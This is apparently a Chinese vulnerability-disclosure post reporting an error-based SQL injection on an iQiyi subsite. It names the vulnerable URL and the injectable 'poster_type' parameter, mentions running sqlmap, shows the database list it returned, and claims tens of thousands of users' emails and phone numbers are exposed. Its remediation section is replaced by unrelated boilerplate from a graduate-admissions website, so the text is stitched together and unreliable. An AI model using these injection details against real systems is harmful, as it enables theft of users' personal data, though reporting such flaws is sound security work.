爱奇艺某分站SQL注入(可获取用户邮箱、手机号码等敏感信息)
爱奇艺分站SQL注入一枚,Happy New Year~~
http://huawei-/index.php?s=/Home/Index/getPosters/type/poster_type/poster_type/0/page/1
注入参数:
poster_type
,报错注入~
直接上sqlmap.
available databases [3]:
[*] hw_g7plus_film
[*] information_schema
随便选一个表,里面有几万的用户敏感数据~~
解决方案:海口在线学习信息网
硕士目录查询
博士目录查询
院校信息查询
公布考研初试成绩
关注我们,订阅
权威考研资讯
推免录取信息公开
日-2月29日
请关注研招网官方微博
| | | | |
历年复试基本要求
招生单位信息发布&
招生单位调剂信息&
省市招办信息发布&
| | | | | | | | | }